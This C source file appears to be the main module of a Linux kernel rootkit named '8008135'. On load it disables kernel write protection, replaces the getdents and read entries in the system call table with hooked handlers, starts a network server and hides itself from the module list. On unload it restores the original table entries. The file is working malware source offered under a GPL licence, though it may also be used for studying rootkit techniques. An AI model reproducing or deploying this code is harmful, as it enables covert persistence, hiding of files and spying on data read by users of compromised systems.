/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
 * main.c
 * Copyright (C) 2019 
 * 
 * 8008135 is free software: you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * 8008135 is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License along
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*******************************************************************************/

/**** includes *****************************************************************
*******************************************************************************/
#include "8008135.h"
#include "50ck3t.h"
#include "637d3n75.h"
#include "h1d3m0dul3.h"
#include "h1d3p0r7.h"
#include "p463unpr073c7.h"

/*******************************************************************************/

/***  FUNCTION  ****************************************************************
*          NAME:  8008135_init
*   DESCRIPTION:  initializing Kernel Module - hijacking syscalltable
*    PARAMETERS:  -
*       RETURNS:  int
*******************************************************************************/
static int __init init_8008135(void) {
	printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
	

	sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
	
	printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);

	// turn write protect off
	wprotectionoff();
	
	// add our new handlers
	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
	
	orig_read = (read_ptr)sys_call_table[__NR_read];
	
	sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;

	// turn write protect back on
	wprotectionon();

	printk(KERN_INFO "New syscall in place\n");
	network_server_init();
	hide_module();
	printk(KERN_INFO "Module hidden");
	
	return 0;
}

/***  FUNCTION  ****************************************************************
*          NAME:  8008135_exit
*   DESCRIPTION:  unloading Kernel Module
*    PARAMETERS:  -
*       RETURNS:  -
*******************************************************************************/
static void __exit exit_8008135(void) {
	network_server_exit();
	wprotectionoff();
	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
	sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
	// turn write protect back on
	wprotectionon();
	printk(KERN_INFO "Old syscall back\n");
}

/*******************************************************************************/

module_init(init_8008135);
module_exit(exit_8008135);

/*******************************************************************************/
